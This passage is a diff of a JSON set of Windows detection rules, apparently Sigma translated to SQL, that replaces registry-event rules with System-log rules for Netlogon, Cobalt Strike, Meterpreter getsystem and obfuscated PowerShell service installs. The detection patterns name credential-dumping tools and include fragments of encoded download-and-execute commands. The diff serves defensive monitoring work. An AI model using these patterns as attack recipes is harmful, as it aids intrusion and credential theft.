"a6b33c02-8305-488f-8585-03cb2a7763f2", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE 
'%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "status": "experimental", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND 
param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. 
Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - 
"attack.t1112" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE 
'\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' 
ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + 
"description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' 
AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": 
"Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ "attack.execution", - "attack.t1112" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - 
"description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "status": "test", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE 
'\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value 
modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE 
